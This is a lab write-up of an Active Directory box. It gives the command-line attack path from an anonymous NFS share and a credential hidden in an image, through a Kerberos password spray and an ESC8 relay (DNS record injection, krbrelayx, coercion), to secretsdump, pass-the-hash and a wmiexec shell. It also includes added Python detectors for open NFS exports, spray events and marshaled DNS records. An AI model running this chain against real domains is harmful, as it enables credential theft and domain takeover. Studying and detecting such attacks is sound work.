VulnCicada
Overview
VulnCicada is a medium Windows Active Directory box built around NFS exposure and AD CS abuse. A world-readable NFS profiles share leaks a list of domain users; one profile contains an image file that hides a plaintext credential. Spraying that password (with proper Kerberos authentication against the FQDN) identifies the account owner as Rosie.Powell. From there, Certipy finds the CA is vulnerable to ESC8 — Web Enrollment is enabled without signing enforcement. Combining bloodyAD DNS record insertion, krbrelayx, and netexec coerce_plus relays the DC machine account’s Kerberos authentication to the Web Enrollment endpoint, producing a certificate that can be used to recover the Administrator NTLM hash via secretsdump.
Path: anonymous NFS → image credential → Rosie.Powell → ESC8 Kerberos relay → DC certificate → Administrator NTLM → domain admin.
Enumeration
$ nmap 10.129.235.233
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
111/tcp open rpcbind
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
2049/tcp open nfs
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server

The scan fingerprints a Windows domain controller at cicada.vl / DC-JPQ225.cicada.vl. Two things stand out immediately: NFS on 2049 (unusual for a DC) and the standard AD CS cluster. I added both the short and FQDN to /etc/hosts.
10.129.235.233 cicada.vl DC-JPQ225.cicada.vl
SMB
$ smbclient -L \\\\cicada.vl\\

Nothing accessible anonymously.
NFS
$ showmount -e cicada.vl

$ sudo mount cicada.vl:/profiles /mnt/nfs_share/

The mounted share contains home directories for eleven accounts:
Administrator, Daniel.Marshall, Debra.Wright, Jane.Carter, Jordan.Francis,
Joyce.Andrews, Katie.Ward, Megan.Simpson, Richard.Gibbons, Rosie.Powell, Shirley.West
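From the defender's side, the exposure above is two separate findings: an export mountable by any client, and a share layout that hands out account names to anyone who mounts it. The following is an added example (not code from the writeup) that audits both from `showmount -e` output and the mounted directory names; the output text and directory list are constructed to mirror the box, and the `First.Last` naming pattern is an assumption about this domain.

```python
"""Flag NFS exports that any client may mount and the account names a
world-readable profiles share reveals.

Added example, not part of the original writeup. The showmount output and
directory names below are constructed to mirror the box; parse_showmount
accepts both the Windows "(everyone)" and the Linux "*" client spelling.
"""
import re
from dataclasses import dataclass

# Constructed: what `showmount -e` returns for a Windows NFS server that
# exports /profiles to everyone and a second export restricted by subnet.
SAMPLE_SHOWMOUNT = """Export list for cicada.vl:
/profiles (everyone)
/backup   10.0.0.0/8,192.168.1.0/24
"""

# Constructed: top-level directory names seen after mounting /profiles.
SAMPLE_PROFILE_DIRS = [
    "Administrator", "Daniel.Marshall", "Debra.Wright", "Jane.Carter",
    "Jordan.Francis", "Joyce.Andrews", "Katie.Ward", "Megan.Simpson",
    "Richard.Gibbons", "Rosie.Powell", "Shirley.West", "lost+found",
]

# Client specifications that mean "no restriction at all".
OPEN_CLIENTS = {"*", "(everyone)", "everyone"}

# Assumed naming convention for this domain: First.Last, plus built-ins
# such as Administrator. Adjust for other domains.
ACCOUNT_RE = re.compile(r"^[A-Za-z]+(\.[A-Za-z]+)?$")


@dataclass
class Export:
    path: str
    clients: list


def parse_showmount(text):
    """Parse `showmount -e` output into Export records."""
    exports = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.lower().startswith("export list"):
            continue  # skip blanks and the banner line
        path, _, clients = line.partition(" ")
        spec = clients.strip()
        exports.append(Export(path, spec.split(",") if spec else []))
    return exports


def open_exports(text):
    """Paths any client may mount (no host, subnet or netgroup restriction)."""
    return [e.path for e in parse_showmount(text)
            if not e.clients
            or any(c.strip().lower() in OPEN_CLIENTS for c in e.clients)]


def exposed_accounts(dir_names):
    """Directory names that read as domain account names."""
    return sorted(d for d in dir_names if ACCOUNT_RE.match(d))


def report(showmount_text, profile_dirs):
    """Summarise the findings an auditor would raise on this host."""
    findings = []
    for path in open_exports(showmount_text):
        findings.append(f"export {path} is mountable by any client")
    accounts = exposed_accounts(profile_dirs)
    if accounts:
        findings.append(f"{len(accounts)} account names readable without authentication")
    return findings


if __name__ == "__main__":
    for line in report(SAMPLE_SHOWMOUNT, SAMPLE_PROFILE_DIRS):
        print("[!]", line)
```

Run it as a script to print the findings, or feed `report()` real `showmount -e` output and an `os.listdir()` of the mount point. The `lost+found` entry is there to show that the account filter does not simply count directories.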

Foothold — Credential in NFS Image
AS-REP Roasting attempt
With a clean username list I tried AS-REP roasting first:
$ GetNPUsers.py -usersfile userlist -request -format hashcat -outputfile ASREProastables.txt -dc-ip 10.129.235.233 'cicada.vl/'

No pre-auth disabled accounts.
Image files on the share
A recursive look at the share shows that only two directories contain files: Administrator/vacation.png and Rosie.Powell/marketing.png. The Administrator image copies fine, but Rosie’s file returns Permission denied. Elevating locally with sudo chmod on the NFS-mounted path works around it:
$ sudo chmod +r /mnt/nfs_share/Rosie.Powell/marketing.png
$ cp /mnt/nfs_share/Rosie.Powell/marketing.png .

The website on port 80 offers nothing useful:

Opening marketing.png reveals embedded plaintext credentials:

Password spray
Spraying the recovered password against the user list via plain SMB produces no hits. The DC enforces Kerberos-only authentication (NTLM disabled), so the spray needs the FQDN and -k:
$ nxc smb DC-JPQ225.cicada.vl -u userlist -p "Cicada123" -d "cicada.vl" -k

Rosie.Powell is the owner of the credential.
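A Kerberos-only domain does not hide a spray; it moves the evidence from NTLM logon events to the KDC. Each wrong guess lands on the DC as event 4771 (Kerberos pre-authentication failed, Status 0x18), and the one account whose password matched shows up as a successful 4768 from the same source moments later. The following added example (not from the writeup) implements that detection over constructed events in a flattened form of those two event IDs; the field names follow the Windows event schema, while the timestamps and the 10.10.14.8 source address are made up.

```python
"""Detect a Kerberos password spray in domain controller security events.

Added example, not from the original writeup. Events are constructed in a
flattened form of Windows Security events 4771 (Kerberos pre-authentication
failed; Status 0x18 means wrong password) and 4768 (TGT requested; Status 0x0
is success). Field names follow the event schema; times and addresses are
made up. 10.10.14.8 stands in for the spraying host.
"""
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2025, 1, 1, 12, 0, 0)
SPRAYED = ["Administrator", "Daniel.Marshall", "Debra.Wright", "Jane.Carter",
           "Jordan.Francis", "Joyce.Andrews", "Katie.Ward", "Megan.Simpson",
           "Richard.Gibbons", "Shirley.West"]


def _ev(event_id, user, ip, status, seconds):
    return {"EventID": event_id, "TargetUserName": user, "IpAddress": ip,
            "Status": status, "TimeCreated": T0 + timedelta(seconds=seconds)}


# Constructed: ten wrong-password failures for ten different accounts from
# one address within seconds, then one successful TGT for the account whose
# password matched, plus one unrelated typo from a workstation.
SAMPLE_EVENTS = (
    [_ev(4771, u, "10.10.14.8", "0x18", i) for i, u in enumerate(SPRAYED)]
    + [_ev(4768, "Rosie.Powell", "10.10.14.8", "0x0", 10)]
    + [_ev(4771, "Katie.Ward", "10.129.235.50", "0x18", 30)]
)


def detect_spray(events, min_users=5, window=timedelta(minutes=5)):
    """One finding per source address whose pre-auth failures span at least
    min_users distinct accounts inside any window, with any TGT the same
    source obtained once the failures began (the spray's hit)."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev["IpAddress"]].append(ev)

    findings = []
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e["TimeCreated"])
        fails = [e for e in evs if e["EventID"] == 4771 and e["Status"] == "0x18"]
        if not fails:
            continue
        # Sliding window over the failures, keeping the largest set of
        # distinct accounts seen in any span no longer than `window`.
        best, start = set(), 0
        for end in range(len(fails)):
            while fails[end]["TimeCreated"] - fails[start]["TimeCreated"] > window:
                start += 1
            users = {e["TargetUserName"].lower() for e in fails[start:end + 1]}
            if len(users) > len(best):
                best = users
        if len(best) < min_users:
            continue
        first_fail = fails[0]["TimeCreated"]
        hits = sorted({e["TargetUserName"] for e in evs
                       if e["EventID"] == 4768 and e["Status"] == "0x0"
                       and e["TimeCreated"] >= first_fail})
        findings.append({"source": ip, "users": sorted(best), "hits": hits})
    return findings


if __name__ == "__main__":
    for f in detect_spray(SAMPLE_EVENTS):
        print(f"[!] spray from {f['source']}: {len(f['users'])} accounts, hits={f['hits']}")
```

The threshold and window are the knobs to tune: a low `min_users` catches slow sprays but also help-desk mistakes, so the `hits` field matters, since a successful TGT from the same source right after a burst of failures is what separates a spray that worked from one that just made noise.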
Privilege Escalation — ESC8 via Kerberos Relay
Discovering the CA
Checking shares as Rosie reveals the AD CS infrastructure is present:
$ nxc smb DC-JPQ225.cicada.vl -u rosie.powell -p "Cicada123" -d "cicada.vl" -k --shares

Certipy enumerates the vulnerable templates and CAs. With a plain DC IP it throws Kerberos errors; passing the FQDN as -dc-ip and specifying the nameserver resolves them:
$ certipy find -k -vulnerable -text -dc-ip DC-JPQ225.cicada.vl -no-pass -ns 10.129.235.234

The CA cicada-DC-JPQ225-CA has Web Enrollment enabled with Request Disposition: Issue and no signing enforced — the conditions for ESC8.

Kerberos relay chain
ESC8 via Kerberos relay requires three moving parts: a DNS record pointing to the attacker host, a relay listener, and a coercion trigger.
1. Add a DNS record pointing to our host (using bloodyAD since dnstool.py produced errors):
$ python3 bloodyAD.py --host dc-jpq225.cicada.vl -u 'rosie.powell' -p 'Cicada123' \
-k -d 'cicada.vl' add dnsRecord 'dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA' 10.10.14.8
2. Start krbrelayx to relay incoming Kerberos authentication to the Web Enrollment endpoint:
$ python3 krbrelayx.py -t 'http://dc-jpq225.cicada.vl/certsrv/certfnsh.asp' \
--adcs --template DomainController -v 'CICADA'
3. Coerce DC authentication using netexec coerce_plus (PetitPotam and Coercer did not work here):
$ netexec smb DC-JPQ225.cicada.vl -u Rosie.Powell -p Cicada123 -k -M coerce_plus \
-o LISTENER=dc-jpq2251UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA
The relay succeeds and krbrelayx saves a .pfx certificate for the DC machine account.
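The durable fix for ESC8 is on the CA side (require HTTPS with Extended Protection for Authentication on the enrollment endpoint, or remove Web Enrollment), but step 1 of the chain also leaves a durable artifact: a DNS record whose name is a real host name followed by a marshaled CREDENTIAL_TARGET_INFORMATION blob, which is what makes the coerced DC request a ticket for its own SPN. The following added example (not from the writeup) audits a zone dump for such names. The records are constructed; `MARSHAL_MARKER` is the suffix of the record name shown above, and flagging any other long base64-looking tail ending in `BAAAA` on a known host name is a heuristic assumed here rather than a documented rule.

```python
"""Audit AD-integrated DNS for record names carrying a marshaled
CREDENTIAL_TARGET_INFORMATION blob appended to a real host name.

Added example, not from the original writeup. The record list is
constructed; MARSHAL_MARKER is the suffix of the record name shown in the
writeup, and treating any other long base64-looking tail that ends in
"BAAAA" on a known host name as suspicious is a heuristic assumed here.
"""
import re

MARSHAL_MARKER = "1UWhRCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAYBAAAA"
LOOSE_TAIL = re.compile(r"^[A-Za-z0-9+/]{30,}BAAAA$")

# Constructed zone dump: (name, type, data). The first two records are
# legitimate; the third is the record from the writeup, the fourth a variant
# blob on another known host name, the fifth a normal host with a suffix.
SAMPLE_RECORDS = [
    ("dc-jpq225.cicada.vl", "A", "10.129.235.233"),
    ("www.cicada.vl", "A", "10.129.235.233"),
    ("dc-jpq225" + MARSHAL_MARKER + ".cicada.vl", "A", "10.10.14.8"),
    ("fs01AbCdEfGhIjKlMnOpQrStUvWxYz0123456789BAAAA.cicada.vl", "A", "10.10.14.8"),
    ("fs01-backup.cicada.vl", "A", "10.129.235.40"),
]
# Host names that exist in the domain (from AD computer objects in practice).
KNOWN_HOSTS = ["dc-jpq225", "fs01"]


def classify(name, known_hosts):
    """Return (kind, spoofed_host) for a marshaled-looking label, else None."""
    label = name.split(".")[0]
    # Exact signature: the constant marker from the writeup after a host name.
    if label.endswith(MARSHAL_MARKER) and len(label) > len(MARSHAL_MARKER):
        return "marshaled", label[: -len(MARSHAL_MARKER)]
    # Heuristic: a known host name followed by a long base64 run ending BAAAA.
    for host in known_hosts:
        if label.lower().startswith(host.lower()) and LOOSE_TAIL.match(label[len(host):]):
            return "suspicious-tail", host
    return None


def audit_zone(records, known_hosts):
    """Findings for every record whose name impersonates a host with a blob."""
    known = {h.lower() for h in known_hosts}
    findings = []
    for name, rtype, data in records:
        hit = classify(name, known_hosts)
        if hit is None:
            continue
        kind, host = hit
        findings.append({"record": name, "type": rtype, "target": data,
                         "kind": kind, "spoofed_host": host,
                         "known_host": host.lower() in known})
    return findings


if __name__ == "__main__":
    for f in audit_zone(SAMPLE_RECORDS, KNOWN_HOSTS):
        print(f"[!] {f['kind']}: {f['record']} -> {f['target']} "
              f"(impersonates {f['spoofed_host']})")
```

Feed `audit_zone()` the zone's records (for example from a scheduled export) and alert on any finding; the `target` field also tells you which address the impersonated host name now resolves to, which is the attacker-controlled listener in this chain. Because authenticated users can add records to an AD-integrated zone by default, the audit belongs on a schedule rather than in a one-off review.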
Root
With the DC machine account certificate, authenticate as dc-jpq225$ and use the resulting Kerberos ticket with secretsdump to retrieve only the Administrator's NTLM hash:

$ secretsdump.py cicada.vl/dc-jpq225\$@dc-jpq225.cicada.vl -k -no-pass -just-dc-user Administrator

Pull a TGT for Administrator using the hash, then get a shell with wmiexec:
$ getTGT.py cicada.vl/Administrator -hashes :85a0da53871a9d56b6cd05deda3a5e87 -dc-ip 10.129.235.250
$ wmiexec.py cicada.vl/Administrator@dc-jpq225.cicada.vl -k -no-pass

Takeaways
- Exposed NFS on a DC is an unusual and high-value target — world-readable profile directories can leak usernames, files, and even embedded credentials without touching SMB at all.
- ESC8 requires three coordinated steps (DNS poisoning, relay listener, coercion trigger), but netexec coerce_plus makes the coercion piece straightforward when PetitPotam falls short. The Kerberos-only domain environment also meant every tool needed explicit FQDN targeting and -k flags rather than NTLM.